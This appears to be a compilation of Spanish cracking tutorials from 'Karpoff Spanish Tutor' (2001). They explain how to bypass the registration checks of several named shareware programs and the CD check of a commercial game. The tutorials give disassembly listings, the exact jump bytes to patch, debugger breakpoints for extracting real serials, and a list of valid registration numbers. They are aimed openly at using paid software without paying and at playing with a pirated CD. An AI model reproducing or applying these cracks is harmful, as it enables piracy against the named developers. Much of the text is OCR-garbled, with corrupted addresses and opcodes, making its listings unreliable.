Karpoff Spanish Tutor 2001 


Card Crator 


PROTECCION: Name / Seris 

Objetivo: Simular estar registrado 

Descripcion: Programa que te permite crear tus propias tarjetas postales para enviar a cualquier amigo/a 

Dificultad: Novato 

DOWNLOAD : www.e-—motional.com 

Herramientas: WinDams y editor hexadecimal 

CRACKER: Riverwind FECHA: 27/01/2001 
INTRODUCCION 


Bueno despues de una temporada sin hacer nada,me he decidido a crakear este programilla que aunque no es 
muy util y sus funciones son escasas puede servirnos para enviar una postal personalizada a cualquier 
amigo/a,asi que no espereis grandes cosas de este programa y su proteccion es bastante simple,solo que al 
hacer alguna postal nos aparecer en ella que el programa es una demo,asi que lo reventaremos para quitar esa 


molesta publicidad. 


AL ATAKE 


Bueno pues despues de haber instalado el programa lo examinaresmos y para ello nos vamos al "abaut" aver que nos 
encontramos por aqui,bueno pues le damos al botoncito de "Register Now!" y nos sale una ventanita para introducir 


nuestros datos,en mi caso "Riverwind/123456" 


Le damos a register y nos sale una ventanita que nos dice "This User Name does not match the registration code 
entered.” osea en el idioma de cervantes que nos manda para casa sin nuestro regalito,pues bien nos apuntamos lo que 
nos dice en un papel y desamblamos el dichoso programa con el Windams e le damos al Strn Ref y nos saldran todas 
las cadenas del programa en esta ventanita buscamos lo que te salia al intentar registrar el programa bueno si ya lo has 
hecho tendras que ver algo como esto 


* Possible StringData Ref from Data 0b3j ->="This User Name does not match " 
->"the registration code entered." 
l 


:00403504 SBCE mov ecx, esi 
:00403506 ESOEFFOZ200 call 00433419 


* PReferenced by a (U)inconditional or (C)onditional Jump at Addresses: 
|:0040329B(C), :004034F6 (0) 
1 


bien,lo que vamos hacer sera rastrear el codigo hacia arriba para ver que es lo que hay asi que ya estais mirandolo y 
pensando un poquitin...creo que tampoco es tan dificil saber que es lo que nos combiene,bien os lo dire yo tenemos que 
llegar asta.... 


:0040336D ESDEF2FFFF call 00402650 


:00403372 85C0 test 05h eax 


:0040337A 51 push ecx 
:0040337B 8D54240C lea edx, dword ptr [esp+0C] 


bueno supongo que ya sabeis lo que teneis que hacer, tenemos que cambiar el salto condicional por uno incondicional o 
sea 84 por 85,este es el salto responsable de que nos diga que no es valido la linea anterior que es 00403372 es la que 
compara nuestro serial con el verdadero asi que si cambiamos el salto obtendremos nuestra recompensa asi que 
miramos en la parte de abajo del WinDams donde pone offset y nos apuntamos la diereccion en un papel habrimos el 
editor hexa y cambiamos......ya se te ha olvidado?el 84 por el 85!!guardamos los cambios y metemos de nuevo nuestro 
name/serial y como es logico nos da las gracias por haberlo comprado,bueno pues ya tienes el programa para ti 


solito,jeje. 


Heyyy un momento que leñes pasa?no habiamos terminado?,por que al cerrar el programa me dice que esta sin 
registrar?,bueno tranquilos se ve que todavia tiene un poco de trabajo, vallamos al salto modificado,si nos fijamos hay 


un call un test y un je pues bien,sigamos el call que es el mas sospechoso de todos.. 


Ahora lo que tenemos que hacer es rastrear el codigo hacia abajo, vereis unos cuantos saltos,que si quereis los podeis 
probar con ellos pero ya os adelanto que no conseguireis nada,nuestro salto esta mas escondido,despues de estar un 
ratito examinando el codigo nos encontramos con algo bastante sosopechoso y que parece ser el responsable de la 


comprobacion 


200402712 C644241C02 mov [esp+1C], 02 
200402717 8D4C2408 lea ecx, dword ptr [esp+08] 
:0040271D ESF4270300 call 00434F16 


Bueno pues este saltito que veis aquie si es el reponsable de que al cerrar el programa comprueve si nuestros datos son 
correctos si modificamos es salto incodicional por uno condicional obtendremos el efecto que desamos teneis que 
cambiar el 75 por un 74 y el programa quedara registrado,espero que este tuto os sirva para algo. 


Saludos a todos y en especial a Karpoff. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Flash 32 Capture 


Name/serial 

Simular estar registrados 

Programa para capturar pantallas 

novato 

http://www.logipole.com 

Editor hexadecimal y WinDams, Trw2000 


Riverwind FECHA: 31/01/2001 


INTRODUCCION 


Trabaja bajo Windows 95, Windows 98, Windows NT 4 y 2000,captura imágenes de los archivos, imágenes 
de Internet WebCams, imágenes del Internet Explorador escondite. Flash32 se instala como un icono de la 
bandeja en la barra de la bandeja de Windows. Las capturas pueden ahorrarse con varios formatos gráficos, 
modificó, impreso... También encienda 32 permite la creación de iconos, cursores, las animaciones (ANI, 
AVL FLL FLC y GIF), papeles de empapelar, logotipos... Una captura de la pantalla puede ahorrarse o puede 
imprimirse con ou sin la interacción con el usuario. Aunque todo esto lo saque de la misma ayuda del 
programa me parece que no captura pantallas de windows,no lo he probado,la proteccion si no me he 
equibocado es ridicula, basicamente no tiene. 


AL ATAKE 


Bueno pues a este programa le atacaremos por tres sitios diferentes, dado que me ha parecido muy facil,talvez la mas 
limpia de todas sera la ultima pues no modificaremos nada,capturaremos un serial valido,empezemos por hacer la 
copia del ejecutable por lo que nos pueda pasar.Ejecutamos flash32 y nos aparecera una camara al lado del reloj de 
windows,nos vamos al "About" clikeando con el boton derecho del raton sobre la camara,aqui nos dice que pasados 30 
dias deberemos registrarnos o dejara de funcionar,cerramos esta ventanita y ahora nos metemos en "register" metemos 
nuestros datos y pulsamos "ok" esto nos escupira con una estupida ventana que nos dice "Invalid key bla bla 

bla.... "bueno nos apuntamos lo que nos dice,desamblamos y nos vamos directamente a buscar la cadena Invalid key 
cuando la tengamos localizada pulsaremos varias veces por si hay mas de una y como no la hay tendremos que ver 


algo como esto 


:00421E14 830404 


:00421E17? 3BC1 
:00421E19 742E 
:00421E1B 6410 


add esp, 00000004 
cmp eax, ecx 

je 00421E49 

push 00000010 


* Possible StringData Ref from Data 0bj ->"Register" 


:00421E1D 68BCC24500 push 0045CZ2BC 


* Possible StringData Ref from Data 0bj ->"Invalid key" 


A O a 


:00421E27? 55 


push ebp 


lo que esta marcado en azul es donde nos dejaron,bueno pues visto y no visto,yo juraria que el salto ese es el que nos 
da el mensaje de error,bueno pues modificar este salto y esto se habra terminado, ya sabeis lo q teneis que hacer asi que 
no dire nada mas.Estos programadores no deberian saber muy bien que hacian,mas que nada parece un crackMe que 
otra cosa,en fin peor para ellos. 


Para el siguiente remplazar el original por el crackeado y recuerda que tienes que tener los dos ejecutables. 


Bueno vamos a por el otro ataque,este consiste en adelantar la fecha del ordenador un mes para que expire el programa 
cuando lo hayamos hecho deberiamos ver una ventanita que nos dice algo asi como "The evaluation...."(para que os 
molesteis un poquillo que alguno solo se dedica a coger las direcciones) ;) bueno cuando lo hayais encontrado teneis 
que ver esto 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
|:00411F48(C) 
| 


* Possible StringData Ref from Data 0bj ->"The evaluation period is finished." 


O O a 


Bueno pues esto es muy sencillo,lo que teneis que hacer es seguir la referencia que vemos arriba de donde nos dejaron 
osea 00411148 esto nos llevara a.... 


:00411F45 7456 je 00411F9D 

:00411F47 48 dec eax 

:00411F4A 8B9424BCO10000 mov edx, dword ptr [esp+000001EC] 
:00411F51 6400 push 00000000 


si sabeis lo que hos combiene modificareis el 742B por 752B,con esto el programa no caducara,pero no estaries 
registrados y os recordaran que teneis que registraros aunque no pasen los dias para nuestro programa aqui que cada 
cual haga lo que quiera. 


Bueno pues este es el ultimo atake el mas limpio y efectivo de los tres,que decir tiene que no vamos a modificar 
ningun byte, yo utilizare el TRW2000 aunque podeis utilizar cualquiera de los dos,los comandos son casi los mismos 
pero pueden cambiar las direcciones ya que en cada ordenador son diferentes,bueno arrancamos el trw2000 le damos a 
"Browse" y buscamos Flash32 cuando lo tengamos listo le damos a "load" y entraremos de lleno en al trw2000(desde 
ahora trw),pulsamos FS o CTRL+N y apareceremos en windows de nuevo,metemos nuestros datos y antes de darle al 
ok pulsamos ctrl+n para entrar en trw ahi lo que tenemos que hacer es poner un breakpoint desde ahora "bpx",que sera 


bpx messageboxa 


y pulsamos FS saldremos de nuevo a window y el programa nos dira "Invalid Key" le damos al ok y entraremos de 
nuevo al trw,nos dejara en User!MessageBoxa,bien tecleamos bc* con esto borraremos todos los bpx que tengamos 
puestosísi no te lo sabes te recomiendo que te leas las ayudas del programa),si os fijais un poco mas arriba de donde se 
escriben los comandos vereis que pone User32!.text+316C esto nos dice que estamos dentro de la libreria User,a 
nosotros no nos interesa para nada asi que pulsamos F10 y habremos llegado a nuestro querido flash32 en mi caso 
aparecere en 


016F: 00421E2E push BYTE+01 


Bien ahora llego el momento de tracear el programa hacia arriba y os preguntareis como se hace,pues bien si pulsais 
F6 vereis que aparece una linea de color azul que resalta las direcciones esta se mueve con los cursores hacia arriba o 
abajo segun os convenga,nosotro la deslizaremos hacia arriba, fijaros bien por que ya estamos muy cerca de nuestro 
serial bien pues si examinamos lo siguiente 


016f: 00421E0E mov ecx,[0046A9F4] 


016F: 00421E14 add esp,byte+04 
016F: 00421E17 cmp eax,ecx----------- >al loro que este compara nuestro serial con el autentico 
016d: 00421E19 jz 00421E49----------- >salta si es falso 


bueno como todo esto ya paso,lo que vamos hacer sera detener el programa justo cuando compara nuestro serial con el 
autentico para ello colocaremos un bpx en la direccion 00421E17 lo podeis poner si lo resaltais con f9 sabreis que 
estara puesto porque el color cambiara a verde sino teclear bpx 00421E17,para salir pulsamos ES y vereis que no sale 
nada,no os preocupeis,meteremos de nuevo nuestros datos y al pulsar ok saltara el bpx,y ahora os preguntareis como se 
sabe el serial bien si haceis %eax os saldra vuestro serial,algo como esto.... 

DEC= 123456789 ---------- >mi serial falso 

HEX= 75bcd15---=-==-=----- >en hexadecimal 

y lo que nos interesa al poner ?ecx 

DEC= -926885701 

HEX= c8c0d8bb---------- >nuestro ansiado serial 

si meteis esto tal y como os lo da el trw no os servira de nada asi que coger la calculadora y convertirlo a decimal y 
conseguireis el auntentico serial para vuestros datos,bueno pues asta aqui hemos llegado,espero que lo espuesto aqui os 


sirva para algo y perdornar si me he equivocado en algo. 


Por cierto os invito a que descubraies el origen de este fallo... 


Flash 32 
The lic file has been modified !! 
Flash 32 cannot run. 


Aceptar | 


suertee!! 


salud2 a todos/as y en especial a Karpoff 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER : 


Karpoff Spanish Tutor 


Quick Calendar Plus v1.1 


Serial. 

Encontrar un numero de serie. 
Es un calendario 

Novato. 


http://www.digijazz.com/ 


W32dasm y un poco de imaginación 


Pedrolas N*8 FECHA: 26/01/2001 


INTRODUCCION 


Hola chicos, aqui estoy nuevamente con el este que es mi tutorial numero 8, esta vez la victima es: 
Quick Calendar Plus v1.1, un bonito programa que sirve para ver un calendario, tener fechas a recordar y te 
dice los dias que faltan para determinadas fechas. 


AL ATAKE 


Ejecutamos el programa y vemos que en la parte inferior hay un sitio donde podemos poner un serial: 


Introduction 


This program is NOT free software. 


'You may evaluate this program tor fourteen (14) days after installation 
free of charge. Atthe end of the fourteen day evaluation period you 
must either send payment of $9.95 to DigiJazz Corporation or 
Uninstall the program, 


Details about sending payment can be found under the Help menu on 
the program's main screen. 


Uninstallation of this program can be: completed using A4dd/Remove 
Programs inthe Microsoft Windows Control Panel. 


Aster payment has been received by Digidazz Corporation, you willbe 
Jsent a resistration kew that wil alow you to sto this message in the 


Tambien nos damos cuenta de que solo admite 3 numeros y digo bien numeros, porque cuando le pones letras el programa se queja. 
Metemos un numero al azar, por ejemplo, "01234" y el programa entra normalmente, pero en la zona superior de la ventana nos enseña el 
siguiente mensaje: 


ES Quick Calendar Plus [Payment Required) 


Es lo unico que se ve.... 


Empecemos el ataque, esta vez vamos a usar el W32dsam, abrimos el ejecutable "QuickCalendarPlus.exe" y vamos a "string references", 
bajamos un poco en la ventana y empezamos a ver numeros, que casualidad, si son de cinco cifras, no creo que el programador haya sido tan 
tonto de que esos numeros sean los de registro. Veamos que nos sale en el W32dsam: 


"123456789048 CDEFGHIJKELMNOPORSTUWWXYZ" 
112625" 


"15142" 
MS 999 ' 
"2000" 
"2001" 
"2002" 
"2003" 

PELAR 
a 2005" 
"2006" 
"22345" 
132115" 
"33412" 
133581" 
"35521" 
"41047" 


otra captura 


“A month must be selected, ' 


tomamos nota de uno de los numeros, por ejemplo el "43304" y lo metemos como numero de registro y el programa nos dice: 


information 


Vaya el programador ha sido un poco tonto que ha dejado los numeros a la vista, aquí teneis un listado de todos ellos: 


33581 
33412 
22345 
10142 
41041 
31921 
43304 


41351 
32115 
12625 
15142 


Ahora el programa muestra lo siguiente: 


ES Quick Calendar Plus 


] 


Ya estamos registrados..... 


Nos vemos en el siguiente tutorial, mientras tanto me podeis escribir a pedrolillas Oyahoo.es 


Bilbao, a 26 de Enero de 2001 
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Programa: El Imperio de las Hormigas 
PROTECCION: CD Check 

Objetivo: Jugar kon CD pirata :-) 

Descripcion: Un juego de estrategia muy bueno 

Dificultad: Facililla 

DOWNLOAD: Pos no sé 


W32dasm Hex WorkShop v2.20 Óó superior y CD Holy Wood de Marylin 


Herramientas: 
Manson :-) 


CRACKER : DeAtH [D*3AM] FECHA: 09/02/2001 


INTRODUCCION 


Este juego es fácil de crackear, pero muy jodido de piratear. Simplemente, dos kambios de pista en los dos 
archivos de mayor tamaño. 


Toda la información aki kontenida es divulgada EXCLUSIVAMENTE kon fines edukativos. El autor 
no se responsabiliza del uso k se le pueda dar. 


Bueno, si no dejo algo klaro, haz el favor de komunikarmelo en deathh O latinmail.com 


AL ATAKE 
Empezemos: 


Antes de empezar, rekomenbale hacer una kopia del EXE por si akaso. El archivo k vamos a crackear es el 
HORMIGAS.EXE, se enkuentra en la carpeta ande hayas instalado el juego. 
Desensamblamos el archivo kon el W32Dasm, y buscamos la funcion GetDriveTypeA. Esta función es a la k suelen 
llamar la mayoría de los juegos para komprobar el CD :-). 


Estudiernos este kodigo: Compara ebx con 05 
despues de komprobar 51 hay un CD en la mudad 


5110 hay, ebx =5 Sigamos 


Esta es la dirección a la k galta si no hay CD 


Este salto 10 s el real primero lo crack 
para kN O kyera ED, pero nosotros 
=>, Kkeremos esjugar KON un CD 
presta no ? ino te puedes hac er 
h kopia del juego, lo mejor es kfuerzes 
este salto, 


: D04BCD47 


:O04BCDAL SDEC2484000000 r [esp+00000084] 


Si hay CD hace la komprobación d k sea el bueno, el suministrado por la casa. Si no lo es, nos saka una ventanita 
diciendonos k introduzkamos el bueno y nos echa a la puta kalle :-(. Nosotros keremos k acepte uno pirata, asi k si 
nos fijamos algo más abajito (V04BCDA1) vemos k lee del CD la karpeta "data" y se puede jugar y to' eso. 

QUE HACEMOS??? 

Muy fácil. Vemos k la llamada a leer la karpeta y todo eso ese produce (se producen dos, la principal es la segunda) 
en 

:004BCD3F JNE 004BCDA 

La instruccion de antes TEST BL, BL es la k marka si este salto se producirá o no. Para k se produzca, BL tiene k 
ser igual a 1 

SOLUCION: 

Viendo k es un salto korto(es de dos bytes la instruccion), solo tendremos k kambiar ese salto kondicional por un 
salto incondicional 

COMO???? 

Kon un editor hex editamos el archivo, y una vez allí nos desplazamos al Offset del salto en cuestión (kuando steis 
kon el W32Dasm, kolokados en el salto, mirar a bajo y vereis k os pone ...Code Data :004BCD3F 

Offset: 000BCD3F) y solamente kambiais el 75 (¡ne) por EB (¡mp), kon lo k habreis hecho un salto condiconal 
inkondicional, saltará siempre y podreis jugar kon CD pirata! 


¡FELICIDADES LO HAS CRACKEADO!!! 


Gracias a Karpoff por publikar mi tutorial y gracias a mi musa. 
Un saludo a DiSaSTeR aNTiMiKRoSo0FT, mi klan. Podeis enkontrarlo en http://43am.tripod.com, página kon cracks de los últimos 
programas, links, noticias, kopias de seguridad, etc... 
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S-Pic Viewer v2.02 


PROTECCION: Nombre y Serial 


Simular estar registrados. 


Indicaciones para obtener la clave válida. 


W32Dasm, Editor hexadecimal (yo uso AXE 2.1) 


INTRODUCCION 


Hola a todos. Antes que nada, decir que este es mi primer tutorial y que espero sirva 
a todos los que quieran iniciarse en el apasionante mundo de la ingeniería inversa. 


El programita en cuestión permite trabajar con varios formatos gráficos, muestra las 
características de éstos, los copia, etc. etc. Supongo que ya tendréis muchos 
programas de este tipo. Este en concreto no aporta casi nada nuevo. 


AL ATAKE 


Bien, vamos a empezar. Nada más ejecutar el programa, vemos una ventanita que dice "Register me!". Podemos ver 
que hay un número de programa, y una casilla para introducir la clave, que supongo será calculado con el ID: 


Register mel E 


This program is Trialware. You can run this program up to 30 
times without registration. If you want to use this application 
after evaluation period is over, you should register it. 


To obtain unlock key, please fill out the On-line Order Form or 
send us the Order Form by fax: +1 (275)-418-6895 


On-line Order Form: http: + tw. pukudr comesoftware 
Fax Order Form 


Registration 


Program ID: [251 1-58812-5 
Unlock Key: | 


Confirma unlock key | | consider to register later | 


Vale, pues lo primero que hacemos es pulsar el botón que dice "Confirm unlock key". Observamos lo que ocurre: 


Register mel XK 


This program is Trialware. You can run this program up to 30 
times without registration. lf you want to use this application 
after evaluation period is over, you should register it. 


To obt ain untool honra dara Bill bes Pis lio rder Form or 
send us the CET] 


pidio O Invalid unlock key. 


Registration 


Confirm unlock key | consider to register later | 


Pues ahora hemos de fijarnos en el mensaje que nos sale: "Invalid unlock key.”. Desensamblamos el ejecutable del 
programa con W32Dasm. Cuando lo tengamos, pulsamos el botón de "String references” y buscamos el mensaje 
que hemos obtenido. Bien ... encontramos una sola referencia en todo el ejecutable: 


:D04B5FCO ESCIE1F4FF call 0040418C 


:D0O4B5FC5 7519 Jne O04B5FEO 

:DO4B5FC7 A130444C00 mov eax, dword ptr [004C4430] 
:DO4B5FCC 8B00 mov eax, dword ptr [eax] 
:DO4B5FCE 66C780300C0000FBFF mov word ptr [ebx+00000C30], FFFB 
:004B5FD7 8BC3 mov eaX, ebx 

:D004B5FD9 ES4ESFF9FF call 0044EF2C 

:OO4B5FDE EB2D 3mp 004B600D 


* Referenced by a (Ujnconditional or (Cjonditional Jump at Address: 
| :004B5FC5(C) 
| 


:DO4BS5FEO 6A00 push 00000000 
:DO4B5FE2 668B0D38604B00 mov CX, word ptr [004B6038] 
:OO4B5FE9 B201 mov dl, 01l 


* Possible StringData Ref from Code 0b3] ->"Invalid unlock key." 


Unas líneas más arriba vemos "Referenced by a (U)nconditional or (Cjonditional Jump at Adress: 004B5FCS5". El 
salto es condicional. El CALL que hay justo encima compara el serial introducido con el verdadero y el salto nos 
lleva al mensaje de error o al mensaje de premio, según el resultado de la comparación. Pues nos interesa que ese 
salto no se produzca. Así que vamos a la dirección del salto condicional, nos colocamos encima con el cursor y 
observamos la barra de información que aparece en la parte inferior del W32Dasm. Nos apuntamos el offset de la 
instrucción de salto. Abrimos el ejecutable con un editor hexadecimal, vamos al offset del salto y cambiamos el 
7519 por 9090, con lo cual NOPeamos el salto. Guardamos los cambios, salimos del editor hexadecimal y 
ejecutamos el programa. 


Cuando sale la ventana de registro, pulsamos directamente el botón que dice "Confirm unlock key". Una vez hecho 
esto nos sale otra ventana diciéndonos que el programa está registrado. 


S1 pulsáis About en el programa aparece una ventana que dice: 
"This copy of program is licensed to: (el nombre bajo el cual tengáis registrado Windows)" 


Por cierto, si queréis sacar la clave, cargáis el programa con Softice, pulsáis FS, y cuando os aparezca el cuadro de 
registro, y antes de escribir nada, pulsáis Ctrl+D y ponéis un BPX en la dirección donde se encuentra el CALL 
(4B5FCO). Volvéis a pulsar Ctrl+D, tecleáis algo (yo puse "mrfloppy") y le dáis a "Confirm unlock key". SICE 
romperá en la dirección del CALL. Pulsáis FS para entrar en la subrutina, hasta llegar a una instrucción de 
comparación que aparece enseguida. Miráis lo que hay en los registros que se comparan. En uno de ellos aparecerá 
lo que metísteis en el cuadro y en el otro la clave verdadera, que, si no recuerdo mal, eran seis letras. Salís del 
Softice, ejecutáis el programa y cuando pida la clave se la metéis (la clave, claro, porque al programa ya le hemos 
metido bastante otras cosas). 


Bueno, pues esto es todo. Se nota que el tutorial es de novato aunque espero haberme explicado bien. Hasta otra. 


Salu a todos los crackers (novatos y expertos), en especial a los que se conectan al canal del IRC 
Hispano (saludos a Dek_OiN, SeRoCuLTo, ka0zangel, sKuaTeR, Stomper, thePoPe, ... ). 
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Puzzle Brainstorm 
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Simular estar registrados 


Juego de "pensar" 


http://www.stas.net/1/troll 


W32dasm, Editor hexadecimal 
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INTRODUCCION 


Hola a todos y bienvenidos a mi segundo tutorial. Esta vez la víctima que nos 
ocupa es un jueguecillo de esos de resolver acertijos haciendo desaparecer unos 
bloques. He de decir que es más difícil jugarlo que crackearlo, y como me 
entretenía más haciendo ésto último, y vi que a pesar de mi novatez podía hacerlo, 
pues lo hice. Bueno, una vez dicha ésa tontería, podemos pasar a la acción. 


AL ATAKE 


Cuando ejecutamos el jueguecito, nos sale una ventana como ésta: 


AD Az) vio 
RUZZTEL OZ NNAORA 


Puzzle BrainStorm is shareware, this 
demo contains only a few levels of the 


full game. To register the full game , 
Online for $15 please click on the link Register 
below! 
ORDER E 
ONLINE 
Copyright Y 2000 Troll Software. 


Le damos al "Register" y nos aparece una ventana donde poner la clave. Dejamos la casilla 
de la clave en blanco y pulsamos "Register". Ocurre algo así como ésto otro: 


Please enter the registration code 
that you received when you 
ordered Puzzle BrainStorm online, 
then click on the register button. 


Error Invalid Key 


lf you haven't orde Invalid registration key! 
yet, please do so 
button: below! 


ORDER 
ONLINE 


Con el W32Dasm abrimos el ejecutable del programa y en "String References" buscamos a 
ver si aparece el mensaje de error que sale. Hemos tenido suerte, aparece. Sólo hay una 
referencia en todo el ejecutable. Hacemos doble click en el mensaje y W32Dasm nos 
muestra lo siguiente: 


* Possible StringData Ref from Data Ob] ->"Registered" 


:00406A85 6874444200 push 00424474 


* Possible StringData Ref from Data Ob] ->"The game has been registered!" 


:00406A8A 6830444200 push 00424430 
:00406A8F 50 push eax 
:00406A90 EB13 Jjmp 00406AA5 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00406A4B(C) 


:00406A92 8B0DBO0704200 mov ecx, dword ptr [004270B0] 
:00406A98 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Error Invalid Key" 


:00406A9A 6810444200 push 0042441C 


* Possible StringData Ref from Data Ob] ->"Invalid registration key!" 


:00406A9F 6800444200 push 00424400 
:00406AA4 51 push ecx 


Ahí tenemos nuestro mensaje de error. Un poco mas arriba vemos que ese fragmento de 
código está referenciado por un salto condicional en la dirección 406A4B. Y aún más arriba 
vemos una referencia que nos dice: "The game has been registered!". Así que estamos cerca 
del tinglado. Pues nos vamos a esa dirección y vemos lo siguiente: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00406A42 (U) 


:00406A49 85C0 test eax, eax 
:00406A4B 7545 jne 00406A92 


* Possible StringData Ref from Data Obj3 ->"w+" 
:00406A4D 68B8424200 push 004242B8 


* Possible StringData Ref from Data Ob3] ->"soundsIidata.irg" 


:00406A52 6880444200 push 00424480 
:00406A57 E8FA140100 call 00417F56 
:00406A5C B8BFO0 mov esi, eax 
:00406A5E 6A00 push 00000000 
:00406A60 6A00 push 00000000 
:00406A62 56 push esi 

:00406A63 E842140100 call 00417EAA 
:00406A68 6A01 push 00000001 


Pues en la línea que he marcado en rojo está el salto que nos lleva a la zona de error o a la 
zona del acierto. Nos interesa que no se produzca, así que abrimos el ejecutable con un 
editor hexadecimal, nos vamos al offset 6A4B y cambiamos el 7545 por 9090, es decir, 
NOPeamos el salto. Guardamos los cambios y salimos del editor. Ejecutamos el programa y 
vemos que ya no sale ventana de registro. 


Estamos extraoficialmente registrados. Ahora tenemos acceso a todos los niveles del juego. 


Y, por último, unas indicaciones de cómo obtener el serial correcto, para los no amantes de 
los NOPeos. 


Cuando abrís el ejecutable con W32Dasm os debéis fijar en que más arriba aún del salto que 
hemos NOPeado, hay una referencia a la API GetDlgltemTextA. Así que, si tenéis ganas, ya 
sabéis que breakpoint usar con el Softice para sacar el serial correcto. En mi caso, el serial 
correcto era de siete caracteres, tres letras y cuatro números que eran capicúa dos a dos. 


Y ésto es todo. Espero que este segundo tutorial sirva de algo para los que empiezan, porque 
para los expertos, todo ésto será más que pan comido. 


Saludos a todos los crackers (novatos y veteranos), en especial a los que se conectan al IRC- 


[hispano. Hasta mi próximo tutorial. Byezz. 
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Programa: Calories Companion v 1.0.5 


PROTECCION: Serial. 

Objetivo: Simular estar Registrados 

Descripcion: iio es bueno para todos los que estan gorditos y quieran llevar una 
Dificultad: Newbie 

DOWNLOAD : http://www.caloriecompanion.com 

Herramientas: W32dasm para Visual Basic 

CRACKER: Profesor_X FECHA: 20/02/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como parchar el programa Calories Companion v 
1.0.5, de la empresa Notch8 una empresa que se especializa en desarrollar esta utileria para llevar el 
control de tu ingesta de calorias, como tambien poder seleccionar los alimentos que se adecuen a la 


dieta a seguir...jejejje........ como podran ver aumente una nueva seccion que se llama : VALORACION 
DEL SOFTWARE en la cual pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta los 
siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Ahora lo primero es analizar con que esta hecho el Calories Companion v 1.0.5 que desde ahora lo llamaremos 
CC, como primer paso vamos y analizamos el ejecutable del CC con un de las grandiosas utilerias llamada 
Language 2000 v4.5.1.144 y nos mostrara lo siguiente: 


$ CWArchivos de programa Calone Companion Calorielom 


mmmm....como podemos ver no esta empacado y esta hecho en visual basic v 6.0....ok continuemos...... 


Parchando el programa 


ok!!! A LO QUE TE TRAJE CHENCHA ...ococo.os abrimos el programa y lo primero que nos aparece es una 
ventana como esta, damos click NO 


¡Welcome! 


O 


y nos manda a esta siguiente ventana en la cual insertaremos unos datos ficticios, despues damos click en ENTER 
LICENCE 


%. Calone Companion License Regrstration 


Thank-you for purchasing Calorie Companionóo 


Please enter your name as it appears on the order form: 


Please enter your license number in the boxes below 


[1] - fzzaz2 | - fl 
ao ] ev | 


y nos manda la siguiente ventana: 


| CalorieCompanion 


ok!! chavos como pueden ver nos manda el siguiente mensaje de error..mmm..tipico mensaje ...jejejjejj..... bueno ahora 
vamos a desensamblar el ejecutable del CC "*" pero recuerden que deben de tener el w32dasm para Vbasic 0k? continuemos 


ahora damos click en el icono [ ] y pues adelante a buscar la string que dice la ventana de arriba, despues de un 
LAÍO.uccncoo.o PAKATELAS !!!!!!! LA ENCONTRAMOOOOOOSSSSS .ccocoooo 


IW32Dasm List of String Data Items 


ok!! ahora damos doble click en esa referencia y nos manda a la siguiente parte del codigo: 


:0046A445 68CC7B4100 push 00417BCC 

:0046A44A F7DB neg ebx 

:0046A44C FFEDÓÉ call esi 

:0046A44E F7D8 neg eax 

:0046A450 1BCO0 sbb eax, eax 

:0046A452 F7D8 neg eax 

:0046A454 85D8 test eax, ebx <---- COMPARACION SOSPECHOSA 
:0046A456 0F85E1010000 jne 0046A63D 


:0046A45C 8B4DE8 mov ecx, dword ptr [ebp-18] 
:0046A45F 51 push ecx 

:0046A460 68CC7B4100 push 00417BCC 
:0046A465 FFD6E call esi 

:0046A467 85C0 test eax, eax 

:0046A469 0F85BD010000 jne 0046A62C 


* Reference To: MSVBVM60.rtc VarBstrFromAnsi, Ord:0260h 


:0046A46F 8B35CC1 14000 mov esi, dword ptr [004011CC] 
:0046A475 8D55BO lea edx, dword ptr [ebp-50] 

:0046A478 B904000280 mov ecx, 80020004 

:0046A47D B80A000000 mov eax, 0000000A 

:0046A482 BF08000000 mov edi, 00000008 

:0046A487 6A0D push 0000000D 

:0046A489 52 push edx 

:0046A48A 898DD8FEFFFF mov dword ptr [ebpp+FFFFFED8], ecx 
:0046A490 8985DOFEFFEF mov dword ptr [ebp+FFFFFFEDO], eax 
:0046A496 898DESFEFFFF mov dword ptr [ebp+FFFFFEE8], ecx 
:0046A49C 8985E0FEFFFFE mov dword ptr [ebp+FFFFFEEO], eax 
:0046A4A2 898DF8FEFFFE mov dword ptr [ebp+FFFFFEF8], ecx 
:0046A4A8 8985FOFEFFFE mov dword ptr [ebp+FFFFFEFO], eax 


* Possible StringData Ref from Code Obj ->"The license you entered is not *' 
->"valid. If you are'! <<<<<<<ecmmaman CAEAMOS AQUI 


:0046A4AE C785C8FEFFFF48BB4100 mov dword ptr [ebp+FFFFFEC8], 0041BB48 
:0046A4B8 89BDCOFEFFFE mov dword ptr [ebp+FFFFFECO], edi 

:0046A4BE FFDÉ call esi 

:0046A4C0 8D4580 lea eax, dword ptr [ebp-80] 

:0046A4C3 6AO0D push 0000000D 

:0046A4C5 50 push eax 


* Possible StringData Ref from Code Obj ->"sure that you entered the license " 
->"correctly and the program" 


| 

:0046A4C6 C785B8FEFFFFB0BB4100 mov dword ptr [ebp+FFFFFEB8], 0041BBB0 
:0046A4D0 89BDBOFEFFFE mov dword ptr [ebp+FFFEFEBO], edi 

:0046A4D6 FFDÓÉ call esi 

:0046A4D8 8D8DSOFFFFFF lea ecx, dword ptr [ebp+FFEFFES0O] 

:0046A4DE 6AO0D push 0000000D 

:0046A4E0 51 push ecx 


* Possible StringData Ref from Code Obj ->"does not accept your license, " 
->"send a message to" 


A e od ode ole o ol le od ode a ode ole e ol le od ll od ole o ol le e ll ode a e ole ole o ol le od a ol 


Como podemos ver si sUbimos una lineas mas arriba encontramos unos saltos en 0046A456 y 0046A469 bueno pues para 
que acepte cualquier nombre y numero de serie , cambiemos el salto que esta en la direccion de memoria 00464456 
0F85E1010000 jne 0046A 63D por 0046A456 0F84E1010000 je 0046A 63D y listo vayamos a la ventana de registro y damos aceptar 

